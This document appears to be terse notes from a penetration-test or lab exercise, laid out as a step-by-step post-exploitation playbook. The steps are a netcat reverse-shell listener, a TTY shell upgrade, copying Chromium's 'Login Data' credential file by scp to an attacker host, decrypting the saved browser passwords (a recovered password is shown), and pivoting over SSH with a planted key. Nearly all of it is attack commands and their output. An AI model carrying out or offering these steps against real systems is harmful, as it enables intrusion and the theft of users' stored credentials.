Preparation

python -c 'import pty; pty.spawn("/bin/bash")'

Start Reverse Shell Listener

nc -l 8000

Enhance Shell

https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/#method-3-upgrading-from-netcat-with-magic

garry@desktop$
Ctrl-Z
        echo $TERM
        stty -a
        stty raw -echo
fg
reset
export SHELL=bash
export TERM=xterm256-color
stty rows 38 columns 116

Enable ssh and exfiltrate

garry@desktop$
ssh-keygen
-->copy/paste id_rsa.pub -> root@kali
scp .config/chromium/Default/Login\ Data root@10.5.4.3:/tmp

Get Chrome Password

root@kali$
apt-get install python3-pip
sudo pip install pycrypto
apt-get install sqlite3
cd /tmp
      #sqlite3 Login\ Data 'select username_value, password_value from logins;'
./get_chrome_pass.py
   Decrypting the string: b'v10\xa1$z\xb0\x18\xee+\xbbMG\xe0\x0bM\x13\x7fA'                              
   blokeontherange

Get Bobs Password

ssh 192.168.6.105

ssh into server

garry@desktop$
ssh -i .ssh/id_rsa root@server